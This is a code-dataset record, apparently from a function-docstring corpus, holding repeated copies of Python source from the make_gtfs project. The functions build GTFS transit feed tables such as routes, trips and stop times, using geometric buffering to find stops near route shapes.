        halves = list(so.polygonize(result.difference(sliver)))
        # Grow the chosen half slightly so it still covers the
        # original linestring.
        if side == 'left':
            result = halves[0].buffer(1.1 * eps)
        else:
            result = halves[-1].buffer(1.1 * eps)
    return result
def get_nearby_stops(geo_stops, linestring, side, buffer=cs.BUFFER):
    """
    Given a GeoDataFrame of stops, a Shapely LineString in the
    same coordinate system, a side of the LineString
    (string; 'left' = left hand side of LineString,
    'right' = right hand side of LineString, or
    'both' = both sides), and a buffer in the distance units of that
    coordinate system, do the following.
    Return a GeoDataFrame of all the stops that lie within
    ``buffer`` distance units to the ``side`` of the LineString.
    """
    # Buffer the line on the requested side, then keep the stops whose
    # geometry intersects the buffered region.
    zone = buffer_side(linestring, side, buffer)
    mask = geo_stops.intersects(zone)
    return geo_stops.loc[mask].copy()
def build_stop_times(pfeed, routes, shapes, stops, trips, buffer=cs.BUFFER):
    """
    Given a ProtoFeed and its corresponding routes (DataFrame),
    shapes (DataFrame), stops (DataFrame), trips (DataFrame),
    return DataFrame representing ``stop_times.txt``.
    Includes the optional ``shape_dist_traveled`` column.
    Don't make stop times for trips with no nearby stops.
    """
    # Get the table of trips and add frequency and service window details
    routes = (
        routes
        .filter(['route_id', 'route_short_name'])
        .merge(pfeed.frequencies.drop(['shape_id'], axis=1))
    )
    trips = (
        trips
        # The service window ID is the third cs.SEP-separated field of
        # the trip ID; see the trip-ID format used in ``build_trips``.
        .assign(service_window_id=lambda x: x.trip_id.map(
            lambda y: y.split(cs.SEP)[2]))
        .merge(routes)
    )
    # Get the geometries of ``shapes`` and not ``pfeed.shapes``
    geometry_by_shape = dict(
        gt.geometrize_shapes(shapes, use_utm=True)
        .filter(['shape_id', 'geometry'])
        .values
    )
    # Save on distance computations by memoizing:
    # shape ID -> stop ID -> distance (km) along the shape
    dist_by_stop_by_shape = {shape: {} for shape in geometry_by_shape}

    def compute_stops_dists_times(geo_stops, linestring, shape,
                                  start_time, end_time):
        """
        Given a GeoDataFrame of stops on one side of a given Shapely
        LineString with given shape ID, compute distances and departure
        times of a trip traversing the LineString from start to end
        at the given start and end times (in seconds past midnight)
        and stopping at the stops encountered along the way.
        Do not assume that the stops are ordered by trip encounter.
        Return three lists of the same length: the stop IDs in order
        that the trip encounters them, the shape distances traveled
        along distances at the stops, and the times the stops are
        encountered, respectively.
        """
        g = geo_stops.copy()
        dists_and_stops = []
        for i, stop in enumerate(g['stop_id'].values):
            if stop in dist_by_stop_by_shape[shape]:
                # Reuse a previously computed distance for this stop/shape
                d = dist_by_stop_by_shape[shape][stop]
            else:
                d = gt.get_segment_length(linestring,
                    g.geometry.iat[i])/1000  # km
                dist_by_stop_by_shape[shape][stop] = d
            dists_and_stops.append((d, stop))
        # Sort stops into trip-encounter order by distance along the shape
        dists, stops = zip(*sorted(dists_and_stops))
        D = linestring.length/1000
        # Sanity check: projected distances should not wildly exceed the
        # shape length. NOTE(review): the 100 km slack looks like a
        # heuristic tolerance -- TODO confirm intended value.
        dists_are_reasonable = all([d < D + 100 for d in dists])
        if not dists_are_reasonable:
            # Assume equal distances between stops :-(
            n = len(stops)
            delta = D/(n - 1)
            dists = [i*delta for i in range(n)]
        # Compute times using distances, start and end stop times,
        # and linear interpolation
        t0, t1 = start_time, end_time
        d0, d1 = dists[0], dists[-1]
        # Interpolate
        times = np.interp(dists, [d0, d1], [t0, t1])
        return stops, dists, times

    # Iterate through trips and set stop times based on stop ID
    # and service window frequency.
    # Remember that every trip has a valid shape ID.
    # Gather stops geographically from ``stops``.
    rows = []
    geo_stops = gt.geometrize_stops(stops, use_utm=True)
    # Look on the side of the traffic side of street for this timezone
    side = cs.traffic_by_timezone[pfeed.meta.agency_timezone.iat[0]]
    for index, row in trips.iterrows():
        shape = row['shape_id']
        geom = geometry_by_shape[shape]
        # NOTE: this rebinds ``stops`` from the input DataFrame to the
        # per-trip nearby subset; ``geo_stops`` (built above) keeps the
        # full stop set for later iterations.
        stops = get_nearby_stops(geo_stops, geom, side, buffer=buffer)
        # Don't make stop times for trips without nearby stops
        if stops.empty:
            continue
        length = geom.length/1000  # km
        speed = row['speed']  # km/h
        duration = int((length/speed)*3600)  # seconds
        frequency = row['frequency']
        if not frequency:
            # No stop times for this trip/frequency combo
            continue
        headway = 3600/frequency  # seconds
        trip = row['trip_id']
        # Trip IDs encode route, window, base time, direction, and trip
        # index; see the format built in ``build_trips``.
        __, route, window, base_timestr, direction, i = (
            trip.split(cs.SEP))
        direction = int(direction)
        base_time = gt.timestr_to_seconds(base_timestr)
        start_time = base_time + headway*int(i)
        end_time = start_time + duration
        stops, dists, times = compute_stops_dists_times(stops, geom, shape,
            start_time, end_time)
        # One stop_times row per encountered stop; arrival == departure
        new_rows = [[trip, stop, j, time, time, dist]
            for j, (stop, time, dist) in enumerate(zip(stops, times, dists))]
        rows.extend(new_rows)
    g = pd.DataFrame(rows, columns=['trip_id', 'stop_id', 'stop_sequence',
        'arrival_time', 'departure_time', 'shape_dist_traveled'])
    # Convert seconds back to time strings
    g[['arrival_time', 'departure_time']] =\
        g[['arrival_time', 'departure_time']].applymap(
            lambda x: gt.timestr_to_seconds(x, inverse=True))
    return g
def build_feed(pfeed, buffer=cs.BUFFER):
    """
    Convert the given ProtoFeed into a gtfstk Feed.

    Build each GTFS table in dependency order, drop stops that no stop
    time references, and assemble the results into a Feed with distance
    units of kilometers. ``buffer`` is the stop-matching buffer passed
    through to :func:`build_stop_times`.
    """
    # Create Feed tables
    agency = build_agency(pfeed)
    calendar, service_by_window = build_calendar_etc(pfeed)
    routes = build_routes(pfeed)
    shapes = build_shapes(pfeed)
    stops = build_stops(pfeed, shapes)
    trips = build_trips(pfeed, routes, service_by_window)
    stop_times = build_stop_times(pfeed, routes, shapes, stops, trips,
        buffer=buffer)
    # Be tidy and remove unused stops
    stops = stops[stops.stop_id.isin(stop_times.stop_id)].copy()
    # Create Feed
    return gt.Feed(agency=agency, calendar=calendar, routes=routes,
        shapes=shapes, stops=stops, stop_times=stop_times, trips=trips,
        dist_units='km')
mrcagney/make_gtfs | make_gtfs/main.py | buffer_side | python | def buffer_side(linestring, side, buffer):
b = linestring.buffer(buffer, cap_style=2)
if side in ['left', 'right'] and buffer > 0:
# Make a tiny buffer to split the normal-size buffer
# in half across the linestring
eps = min(buffer/2, 0.001)
b0 = linestring.buffer(eps, cap_style=3)
diff = b.difference(b0)
polys = so.polygonize(diff)
# Buffer sides slightly to include original linestring
if side == 'left':
b = list(polys)[0].buffer(1.1*eps)
else:
b = list(polys)[-1].buffer(1.1*eps)
return b | Given a Shapely LineString, a side of the LineString
(string; 'left' = left hand side of LineString,
'right' = right hand side of LineString, or
'both' = both sides), and a buffer size in the distance units of
the LineString, buffer the LineString on the given side by
the buffer size and return the resulting Shapely polygon. | train | https://github.com/mrcagney/make_gtfs/blob/37b6f88e03bac708c2e85d6f4b6d48a0c92e4a59/make_gtfs/main.py#L227-L250 | null | import pandas as pd
import numpy as np
import shapely.ops as so
import shapely.geometry as sg
import gtfstk as gt
from . import constants as cs
def get_duration(timestr1, timestr2, units='s'):
"""
Return the duration of the time period between the first and second
time string in the given units.
Allowable units are 's' (seconds), 'min' (minutes), 'h' (hours).
Assume ``timestr1 < timestr2``.
"""
valid_units = ['s', 'min', 'h']
assert units in valid_units,\
"Units must be one of {!s}".format(valid_units)
duration = (
gt.timestr_to_seconds(timestr2) - gt.timestr_to_seconds(timestr1)
)
if units == 's':
return duration
elif units == 'min':
return duration/60
else:
return duration/3600
def build_stop_ids(shape_id):
"""
Create a pair of stop IDs based on the given shape ID.
"""
return [cs.SEP.join(['stp', shape_id, str(i)]) for i in range(2)]
def build_stop_names(shape_id):
"""
Create a pair of stop names based on the given shape ID.
"""
return ['Stop {!s} on shape {!s} '.format(i, shape_id)
for i in range(2)]
def build_agency(pfeed):
"""
Given a ProtoFeed, return a DataFrame representing ``agency.txt``
"""
return pd.DataFrame({
'agency_name': pfeed.meta['agency_name'].iat[0],
'agency_url': pfeed.meta['agency_url'].iat[0],
'agency_timezone': pfeed.meta['agency_timezone'].iat[0],
}, index=[0])
def build_calendar_etc(pfeed):
"""
Given a ProtoFeed, return a DataFrame representing ``calendar.txt``
and a dictionary of the form <service window ID> -> <service ID>,
respectively.
"""
windows = pfeed.service_windows.copy()
# Create a service ID for each distinct days_active field and map the
# service windows to those service IDs
def get_sid(bitlist):
return 'srv' + ''.join([str(b) for b in bitlist])
weekdays = ['monday', 'tuesday', 'wednesday', 'thursday', 'friday',
'saturday', 'sunday']
bitlists = set()
# Create a dictionary <service window ID> -> <service ID>
d = dict()
for index, window in windows.iterrows():
bitlist = window[weekdays].tolist()
d[window['service_window_id']] = get_sid(bitlist)
bitlists.add(tuple(bitlist))
service_by_window = d
# Create calendar
start_date = pfeed.meta['start_date'].iat[0]
end_date = pfeed.meta['end_date'].iat[0]
F = []
for bitlist in bitlists:
F.append([get_sid(bitlist)] + list(bitlist) +
[start_date, end_date])
calendar = pd.DataFrame(F, columns=(
['service_id'] + weekdays + ['start_date', 'end_date']))
return calendar, service_by_window
def build_routes(pfeed):
"""
Given a ProtoFeed, return a DataFrame representing ``routes.txt``.
"""
f = pfeed.frequencies[['route_short_name', 'route_long_name',
'route_type', 'shape_id']].drop_duplicates().copy()
# Create route IDs
f['route_id'] = 'r' + f['route_short_name'].map(str)
del f['shape_id']
return f
def build_shapes(pfeed):
"""
Given a ProtoFeed, return DataFrame representing ``shapes.txt``.
Only use shape IDs that occur in both ``pfeed.shapes`` and
``pfeed.frequencies``.
Create reversed shapes where routes traverse shapes in both
directions.
"""
rows = []
for shape, geom in pfeed.shapes[['shape_id',
'geometry']].itertuples(index=False):
if shape not in pfeed.shapes_extra:
continue
if pfeed.shapes_extra[shape] == 2:
# Add shape and its reverse
shid = shape + '-1'
new_rows = [[shid, i, lon, lat]
for i, (lon, lat) in enumerate(geom.coords)]
rows.extend(new_rows)
shid = shape + '-0'
new_rows = [[shid, i, lon, lat]
for i, (lon, lat) in enumerate(reversed(geom.coords))]
rows.extend(new_rows)
else:
# Add shape
shid = '{}{}{}'.format(shape, cs.SEP, pfeed.shapes_extra[shape])
new_rows = [[shid, i, lon, lat]
for i, (lon, lat) in enumerate(geom.coords)]
rows.extend(new_rows)
return pd.DataFrame(rows, columns=['shape_id', 'shape_pt_sequence',
'shape_pt_lon', 'shape_pt_lat'])
def build_stops(pfeed, shapes=None):
"""
Given a ProtoFeed, return a DataFrame representing ``stops.txt``.
If ``pfeed.stops`` is not ``None``, then return that.
Otherwise, require built shapes output by :func:`build_shapes`,
create one stop at the beginning (the first point) of each shape
and one at the end (the last point) of each shape,
and drop stops with duplicate coordinates.
Note that this will yield one stop for shapes that are loops.
"""
if pfeed.stops is not None:
stops = pfeed.stops.copy()
else:
if shapes is None:
raise ValueError('Must input shapes built by build_shapes()')
geo_shapes = gt.geometrize_shapes(shapes)
rows = []
for shape, geom in geo_shapes[['shape_id',
'geometry']].itertuples(index=False):
stop_ids = build_stop_ids(shape)
stop_names = build_stop_names(shape)
for i in range(2):
stop_id = stop_ids[i]
stop_name = stop_names[i]
stop_lon, stop_lat = geom.interpolate(i,
normalized=True).coords[0]
rows.append([stop_id, stop_name, stop_lon, stop_lat])
stops = (
pd.DataFrame(rows, columns=['stop_id', 'stop_name',
'stop_lon', 'stop_lat'])
.drop_duplicates(subset=['stop_lon', 'stop_lat'])
)
return stops
def build_trips(pfeed, routes, service_by_window):
"""
Given a ProtoFeed and its corresponding routes (DataFrame),
service-by-window (dictionary), return a DataFrame representing
``trips.txt``.
Trip IDs encode route, direction, and service window information
to make it easy to compute stop times later.
"""
# Put together the route and service data
routes = pd.merge(routes[['route_id', 'route_short_name']],
pfeed.frequencies)
routes = pd.merge(routes, pfeed.service_windows)
# For each row in routes, add trips at the specified frequency in
# the specified direction
rows = []
for index, row in routes.iterrows():
shape = row['shape_id']
route = row['route_id']
window = row['service_window_id']
start, end = row[['start_time', 'end_time']].values
duration = get_duration(start, end, 'h')
frequency = row['frequency']
if not frequency:
# No trips during this service window
continue
# Rounding down occurs here if the duration isn't integral
# (bad input)
num_trips_per_direction = int(frequency*duration)
service = service_by_window[window]
direction = row['direction']
if direction == 2:
directions = [0, 1]
else:
directions = [direction]
for direction in directions:
# Warning: this shape-ID-making logic needs to match that
# in ``build_shapes``
shid = '{}{}{}'.format(shape, cs.SEP, direction)
rows.extend([[
route,
cs.SEP.join(['t', route, window, start,
str(direction), str(i)]),
direction,
shid,
service
] for i in range(num_trips_per_direction)])
return pd.DataFrame(rows, columns=['route_id', 'trip_id', 'direction_id',
'shape_id', 'service_id'])
def get_nearby_stops(geo_stops, linestring, side, buffer=cs.BUFFER):
"""
Given a GeoDataFrame of stops, a Shapely LineString in the
same coordinate system, a side of the LineString
(string; 'left' = left hand side of LineString,
'right' = right hand side of LineString, or
'both' = both sides), and a buffer in the distance units of that
coordinate system, do the following.
Return a GeoDataFrame of all the stops that lie within
``buffer`` distance units to the ``side`` of the LineString.
"""
b = buffer_side(linestring, side, buffer)
# Collect stops
return geo_stops.loc[geo_stops.intersects(b)].copy()
def build_stop_times(pfeed, routes, shapes, stops, trips, buffer=cs.BUFFER):
"""
Given a ProtoFeed and its corresponding routes (DataFrame),
shapes (DataFrame), stops (DataFrame), trips (DataFrame),
return DataFrame representing ``stop_times.txt``.
Includes the optional ``shape_dist_traveled`` column.
Don't make stop times for trips with no nearby stops.
"""
# Get the table of trips and add frequency and service window details
routes = (
routes
.filter(['route_id', 'route_short_name'])
.merge(pfeed.frequencies.drop(['shape_id'], axis=1))
)
trips = (
trips
.assign(service_window_id=lambda x: x.trip_id.map(
lambda y: y.split(cs.SEP)[2]))
.merge(routes)
)
# Get the geometries of ``shapes`` and not ``pfeed.shapes``
geometry_by_shape = dict(
gt.geometrize_shapes(shapes, use_utm=True)
.filter(['shape_id', 'geometry'])
.values
)
# Save on distance computations by memoizing
dist_by_stop_by_shape = {shape: {} for shape in geometry_by_shape}
def compute_stops_dists_times(geo_stops, linestring, shape,
start_time, end_time):
"""
Given a GeoDataFrame of stops on one side of a given Shapely
LineString with given shape ID, compute distances and departure
times of a trip traversing the LineString from start to end
at the given start and end times (in seconds past midnight)
and stopping at the stops encountered along the way.
Do not assume that the stops are ordered by trip encounter.
Return three lists of the same length: the stop IDs in order
that the trip encounters them, the shape distances traveled
along distances at the stops, and the times the stops are
encountered, respectively.
"""
g = geo_stops.copy()
dists_and_stops = []
for i, stop in enumerate(g['stop_id'].values):
if stop in dist_by_stop_by_shape[shape]:
d = dist_by_stop_by_shape[shape][stop]
else:
d = gt.get_segment_length(linestring,
g.geometry.iat[i])/1000 # km
dist_by_stop_by_shape[shape][stop] = d
dists_and_stops.append((d, stop))
dists, stops = zip(*sorted(dists_and_stops))
D = linestring.length/1000
dists_are_reasonable = all([d < D + 100 for d in dists])
if not dists_are_reasonable:
# Assume equal distances between stops :-(
n = len(stops)
delta = D/(n - 1)
dists = [i*delta for i in range(n)]
# Compute times using distances, start and end stop times,
# and linear interpolation
t0, t1 = start_time, end_time
d0, d1 = dists[0], dists[-1]
# Interpolate
times = np.interp(dists, [d0, d1], [t0, t1])
return stops, dists, times
# Iterate through trips and set stop times based on stop ID
# and service window frequency.
# Remember that every trip has a valid shape ID.
# Gather stops geographically from ``stops``.
rows = []
geo_stops = gt.geometrize_stops(stops, use_utm=True)
# Look on the side of the traffic side of street for this timezone
side = cs.traffic_by_timezone[pfeed.meta.agency_timezone.iat[0]]
for index, row in trips.iterrows():
shape = row['shape_id']
geom = geometry_by_shape[shape]
stops = get_nearby_stops(geo_stops, geom, side, buffer=buffer)
# Don't make stop times for trips without nearby stops
if stops.empty:
continue
length = geom.length/1000 # km
speed = row['speed'] # km/h
duration = int((length/speed)*3600) # seconds
frequency = row['frequency']
if not frequency:
# No stop times for this trip/frequency combo
continue
headway = 3600/frequency # seconds
trip = row['trip_id']
__, route, window, base_timestr, direction, i = (
trip.split(cs.SEP))
direction = int(direction)
base_time = gt.timestr_to_seconds(base_timestr)
start_time = base_time + headway*int(i)
end_time = start_time + duration
stops, dists, times = compute_stops_dists_times(stops, geom, shape,
start_time, end_time)
new_rows = [[trip, stop, j, time, time, dist]
for j, (stop, time, dist) in enumerate(zip(stops, times, dists))]
rows.extend(new_rows)
g = pd.DataFrame(rows, columns=['trip_id', 'stop_id', 'stop_sequence',
'arrival_time', 'departure_time', 'shape_dist_traveled'])
# Convert seconds back to time strings
g[['arrival_time', 'departure_time']] =\
g[['arrival_time', 'departure_time']].applymap(
lambda x: gt.timestr_to_seconds(x, inverse=True))
return g
def build_feed(pfeed, buffer=cs.BUFFER):
# Create Feed tables
agency = build_agency(pfeed)
calendar, service_by_window = build_calendar_etc(pfeed)
routes = build_routes(pfeed)
shapes = build_shapes(pfeed)
stops = build_stops(pfeed, shapes)
trips = build_trips(pfeed, routes, service_by_window)
stop_times = build_stop_times(pfeed, routes, shapes, stops, trips,
buffer=buffer)
# Be tidy and remove unused stops
stops = stops[stops.stop_id.isin(stop_times.stop_id)].copy()
# Create Feed
return gt.Feed(agency=agency, calendar=calendar, routes=routes,
shapes=shapes, stops=stops, stop_times=stop_times, trips=trips,
dist_units='km') |
mrcagney/make_gtfs | make_gtfs/main.py | get_nearby_stops | python | def get_nearby_stops(geo_stops, linestring, side, buffer=cs.BUFFER):
b = buffer_side(linestring, side, buffer)
# Collect stops
return geo_stops.loc[geo_stops.intersects(b)].copy() | Given a GeoDataFrame of stops, a Shapely LineString in the
same coordinate system, a side of the LineString
(string; 'left' = left hand side of LineString,
'right' = right hand side of LineString, or
'both' = both sides), and a buffer in the distance units of that
coordinate system, do the following.
Return a GeoDataFrame of all the stops that lie within
``buffer`` distance units to the ``side`` of the LineString. | train | https://github.com/mrcagney/make_gtfs/blob/37b6f88e03bac708c2e85d6f4b6d48a0c92e4a59/make_gtfs/main.py#L252-L266 | [
"def buffer_side(linestring, side, buffer):\n \"\"\"\n Given a Shapely LineString, a side of the LineString\n (string; 'left' = left hand side of LineString,\n 'right' = right hand side of LineString, or\n 'both' = both sides), and a buffer size in the distance units of\n the LineString, buffer th... | import pandas as pd
import numpy as np
import shapely.ops as so
import shapely.geometry as sg
import gtfstk as gt
from . import constants as cs
def get_duration(timestr1, timestr2, units='s'):
"""
Return the duration of the time period between the first and second
time string in the given units.
Allowable units are 's' (seconds), 'min' (minutes), 'h' (hours).
Assume ``timestr1 < timestr2``.
"""
valid_units = ['s', 'min', 'h']
assert units in valid_units,\
"Units must be one of {!s}".format(valid_units)
duration = (
gt.timestr_to_seconds(timestr2) - gt.timestr_to_seconds(timestr1)
)
if units == 's':
return duration
elif units == 'min':
return duration/60
else:
return duration/3600
def build_stop_ids(shape_id):
"""
Create a pair of stop IDs based on the given shape ID.
"""
return [cs.SEP.join(['stp', shape_id, str(i)]) for i in range(2)]
def build_stop_names(shape_id):
"""
Create a pair of stop names based on the given shape ID.
"""
return ['Stop {!s} on shape {!s} '.format(i, shape_id)
for i in range(2)]
def build_agency(pfeed):
"""
Given a ProtoFeed, return a DataFrame representing ``agency.txt``
"""
return pd.DataFrame({
'agency_name': pfeed.meta['agency_name'].iat[0],
'agency_url': pfeed.meta['agency_url'].iat[0],
'agency_timezone': pfeed.meta['agency_timezone'].iat[0],
}, index=[0])
def build_calendar_etc(pfeed):
"""
Given a ProtoFeed, return a DataFrame representing ``calendar.txt``
and a dictionary of the form <service window ID> -> <service ID>,
respectively.
"""
windows = pfeed.service_windows.copy()
# Create a service ID for each distinct days_active field and map the
# service windows to those service IDs
def get_sid(bitlist):
return 'srv' + ''.join([str(b) for b in bitlist])
weekdays = ['monday', 'tuesday', 'wednesday', 'thursday', 'friday',
'saturday', 'sunday']
bitlists = set()
# Create a dictionary <service window ID> -> <service ID>
d = dict()
for index, window in windows.iterrows():
bitlist = window[weekdays].tolist()
d[window['service_window_id']] = get_sid(bitlist)
bitlists.add(tuple(bitlist))
service_by_window = d
# Create calendar
start_date = pfeed.meta['start_date'].iat[0]
end_date = pfeed.meta['end_date'].iat[0]
F = []
for bitlist in bitlists:
F.append([get_sid(bitlist)] + list(bitlist) +
[start_date, end_date])
calendar = pd.DataFrame(F, columns=(
['service_id'] + weekdays + ['start_date', 'end_date']))
return calendar, service_by_window
def build_routes(pfeed):
"""
Given a ProtoFeed, return a DataFrame representing ``routes.txt``.
"""
f = pfeed.frequencies[['route_short_name', 'route_long_name',
'route_type', 'shape_id']].drop_duplicates().copy()
# Create route IDs
f['route_id'] = 'r' + f['route_short_name'].map(str)
del f['shape_id']
return f
def build_shapes(pfeed):
"""
Given a ProtoFeed, return DataFrame representing ``shapes.txt``.
Only use shape IDs that occur in both ``pfeed.shapes`` and
``pfeed.frequencies``.
Create reversed shapes where routes traverse shapes in both
directions.
"""
rows = []
for shape, geom in pfeed.shapes[['shape_id',
'geometry']].itertuples(index=False):
if shape not in pfeed.shapes_extra:
continue
if pfeed.shapes_extra[shape] == 2:
# Add shape and its reverse
shid = shape + '-1'
new_rows = [[shid, i, lon, lat]
for i, (lon, lat) in enumerate(geom.coords)]
rows.extend(new_rows)
shid = shape + '-0'
new_rows = [[shid, i, lon, lat]
for i, (lon, lat) in enumerate(reversed(geom.coords))]
rows.extend(new_rows)
else:
# Add shape
shid = '{}{}{}'.format(shape, cs.SEP, pfeed.shapes_extra[shape])
new_rows = [[shid, i, lon, lat]
for i, (lon, lat) in enumerate(geom.coords)]
rows.extend(new_rows)
return pd.DataFrame(rows, columns=['shape_id', 'shape_pt_sequence',
'shape_pt_lon', 'shape_pt_lat'])
def build_stops(pfeed, shapes=None):
"""
Given a ProtoFeed, return a DataFrame representing ``stops.txt``.
If ``pfeed.stops`` is not ``None``, then return that.
Otherwise, require built shapes output by :func:`build_shapes`,
create one stop at the beginning (the first point) of each shape
and one at the end (the last point) of each shape,
and drop stops with duplicate coordinates.
Note that this will yield one stop for shapes that are loops.
"""
if pfeed.stops is not None:
stops = pfeed.stops.copy()
else:
if shapes is None:
raise ValueError('Must input shapes built by build_shapes()')
geo_shapes = gt.geometrize_shapes(shapes)
rows = []
for shape, geom in geo_shapes[['shape_id',
'geometry']].itertuples(index=False):
stop_ids = build_stop_ids(shape)
stop_names = build_stop_names(shape)
for i in range(2):
stop_id = stop_ids[i]
stop_name = stop_names[i]
stop_lon, stop_lat = geom.interpolate(i,
normalized=True).coords[0]
rows.append([stop_id, stop_name, stop_lon, stop_lat])
stops = (
pd.DataFrame(rows, columns=['stop_id', 'stop_name',
'stop_lon', 'stop_lat'])
.drop_duplicates(subset=['stop_lon', 'stop_lat'])
)
return stops
def build_trips(pfeed, routes, service_by_window):
"""
Given a ProtoFeed and its corresponding routes (DataFrame),
service-by-window (dictionary), return a DataFrame representing
``trips.txt``.
Trip IDs encode route, direction, and service window information
to make it easy to compute stop times later.
"""
# Put together the route and service data
routes = pd.merge(routes[['route_id', 'route_short_name']],
pfeed.frequencies)
routes = pd.merge(routes, pfeed.service_windows)
# For each row in routes, add trips at the specified frequency in
# the specified direction
rows = []
for index, row in routes.iterrows():
shape = row['shape_id']
route = row['route_id']
window = row['service_window_id']
start, end = row[['start_time', 'end_time']].values
duration = get_duration(start, end, 'h')
frequency = row['frequency']
if not frequency:
# No trips during this service window
continue
# Rounding down occurs here if the duration isn't integral
# (bad input)
num_trips_per_direction = int(frequency*duration)
service = service_by_window[window]
direction = row['direction']
if direction == 2:
directions = [0, 1]
else:
directions = [direction]
for direction in directions:
# Warning: this shape-ID-making logic needs to match that
# in ``build_shapes``
shid = '{}{}{}'.format(shape, cs.SEP, direction)
rows.extend([[
route,
cs.SEP.join(['t', route, window, start,
str(direction), str(i)]),
direction,
shid,
service
] for i in range(num_trips_per_direction)])
return pd.DataFrame(rows, columns=['route_id', 'trip_id', 'direction_id',
'shape_id', 'service_id'])
def buffer_side(linestring, side, buffer):
"""
Given a Shapely LineString, a side of the LineString
(string; 'left' = left hand side of LineString,
'right' = right hand side of LineString, or
'both' = both sides), and a buffer size in the distance units of
the LineString, buffer the LineString on the given side by
the buffer size and return the resulting Shapely polygon.
"""
b = linestring.buffer(buffer, cap_style=2)
if side in ['left', 'right'] and buffer > 0:
# Make a tiny buffer to split the normal-size buffer
# in half across the linestring
eps = min(buffer/2, 0.001)
b0 = linestring.buffer(eps, cap_style=3)
diff = b.difference(b0)
polys = so.polygonize(diff)
# Buffer sides slightly to include original linestring
if side == 'left':
b = list(polys)[0].buffer(1.1*eps)
else:
b = list(polys)[-1].buffer(1.1*eps)
return b
def build_stop_times(pfeed, routes, shapes, stops, trips, buffer=cs.BUFFER):
"""
Given a ProtoFeed and its corresponding routes (DataFrame),
shapes (DataFrame), stops (DataFrame), trips (DataFrame),
return DataFrame representing ``stop_times.txt``.
Includes the optional ``shape_dist_traveled`` column.
Don't make stop times for trips with no nearby stops.
"""
# Get the table of trips and add frequency and service window details
routes = (
routes
.filter(['route_id', 'route_short_name'])
.merge(pfeed.frequencies.drop(['shape_id'], axis=1))
)
trips = (
trips
.assign(service_window_id=lambda x: x.trip_id.map(
lambda y: y.split(cs.SEP)[2]))
.merge(routes)
)
# Get the geometries of ``shapes`` and not ``pfeed.shapes``
geometry_by_shape = dict(
gt.geometrize_shapes(shapes, use_utm=True)
.filter(['shape_id', 'geometry'])
.values
)
# Save on distance computations by memoizing
dist_by_stop_by_shape = {shape: {} for shape in geometry_by_shape}
def compute_stops_dists_times(geo_stops, linestring, shape,
start_time, end_time):
"""
Given a GeoDataFrame of stops on one side of a given Shapely
LineString with given shape ID, compute distances and departure
times of a trip traversing the LineString from start to end
at the given start and end times (in seconds past midnight)
and stopping at the stops encountered along the way.
Do not assume that the stops are ordered by trip encounter.
Return three lists of the same length: the stop IDs in order
that the trip encounters them, the shape distances traveled
along distances at the stops, and the times the stops are
encountered, respectively.
"""
g = geo_stops.copy()
dists_and_stops = []
for i, stop in enumerate(g['stop_id'].values):
if stop in dist_by_stop_by_shape[shape]:
d = dist_by_stop_by_shape[shape][stop]
else:
d = gt.get_segment_length(linestring,
g.geometry.iat[i])/1000 # km
dist_by_stop_by_shape[shape][stop] = d
dists_and_stops.append((d, stop))
dists, stops = zip(*sorted(dists_and_stops))
D = linestring.length/1000
dists_are_reasonable = all([d < D + 100 for d in dists])
if not dists_are_reasonable:
# Assume equal distances between stops :-(
n = len(stops)
delta = D/(n - 1)
dists = [i*delta for i in range(n)]
# Compute times using distances, start and end stop times,
# and linear interpolation
t0, t1 = start_time, end_time
d0, d1 = dists[0], dists[-1]
# Interpolate
times = np.interp(dists, [d0, d1], [t0, t1])
return stops, dists, times
# Iterate through trips and set stop times based on stop ID
# and service window frequency.
# Remember that every trip has a valid shape ID.
# Gather stops geographically from ``stops``.
rows = []
geo_stops = gt.geometrize_stops(stops, use_utm=True)
# Look on the side of the traffic side of street for this timezone
side = cs.traffic_by_timezone[pfeed.meta.agency_timezone.iat[0]]
for index, row in trips.iterrows():
shape = row['shape_id']
geom = geometry_by_shape[shape]
stops = get_nearby_stops(geo_stops, geom, side, buffer=buffer)
# Don't make stop times for trips without nearby stops
if stops.empty:
continue
length = geom.length/1000 # km
speed = row['speed'] # km/h
duration = int((length/speed)*3600) # seconds
frequency = row['frequency']
if not frequency:
# No stop times for this trip/frequency combo
continue
headway = 3600/frequency # seconds
trip = row['trip_id']
__, route, window, base_timestr, direction, i = (
trip.split(cs.SEP))
direction = int(direction)
base_time = gt.timestr_to_seconds(base_timestr)
start_time = base_time + headway*int(i)
end_time = start_time + duration
stops, dists, times = compute_stops_dists_times(stops, geom, shape,
start_time, end_time)
new_rows = [[trip, stop, j, time, time, dist]
for j, (stop, time, dist) in enumerate(zip(stops, times, dists))]
rows.extend(new_rows)
g = pd.DataFrame(rows, columns=['trip_id', 'stop_id', 'stop_sequence',
'arrival_time', 'departure_time', 'shape_dist_traveled'])
# Convert seconds back to time strings
g[['arrival_time', 'departure_time']] =\
g[['arrival_time', 'departure_time']].applymap(
lambda x: gt.timestr_to_seconds(x, inverse=True))
return g
def build_feed(pfeed, buffer=cs.BUFFER):
    """
    Assemble a gtfstk Feed (distance units in kilometers) from the
    given ProtoFeed.  ``buffer`` is forwarded to ``build_stop_times``
    and controls how far from a shape a stop may lie and still be
    served by trips on that shape.
    """
    # Build each GTFS table in dependency order
    agency_df = build_agency(pfeed)
    calendar_df, service_by_window = build_calendar_etc(pfeed)
    routes_df = build_routes(pfeed)
    shapes_df = build_shapes(pfeed)
    stops_df = build_stops(pfeed, shapes_df)
    trips_df = build_trips(pfeed, routes_df, service_by_window)
    stop_times_df = build_stop_times(
        pfeed, routes_df, shapes_df, stops_df, trips_df, buffer=buffer)
    # Keep only the stops that some trip actually visits
    used = stops_df.stop_id.isin(stop_times_df.stop_id)
    stops_df = stops_df[used].copy()
    return gt.Feed(
        agency=agency_df,
        calendar=calendar_df,
        routes=routes_df,
        shapes=shapes_df,
        stops=stops_df,
        stop_times=stop_times_df,
        trips=trips_df,
        dist_units='km',
    )
mrcagney/make_gtfs | make_gtfs/main.py | build_stop_times | python | def build_stop_times(pfeed, routes, shapes, stops, trips, buffer=cs.BUFFER):
# Get the table of trips and add frequency and service window details
routes = (
routes
.filter(['route_id', 'route_short_name'])
.merge(pfeed.frequencies.drop(['shape_id'], axis=1))
)
trips = (
trips
.assign(service_window_id=lambda x: x.trip_id.map(
lambda y: y.split(cs.SEP)[2]))
.merge(routes)
)
# Get the geometries of ``shapes`` and not ``pfeed.shapes``
geometry_by_shape = dict(
gt.geometrize_shapes(shapes, use_utm=True)
.filter(['shape_id', 'geometry'])
.values
)
# Save on distance computations by memoizing
dist_by_stop_by_shape = {shape: {} for shape in geometry_by_shape}
def compute_stops_dists_times(geo_stops, linestring, shape,
start_time, end_time):
"""
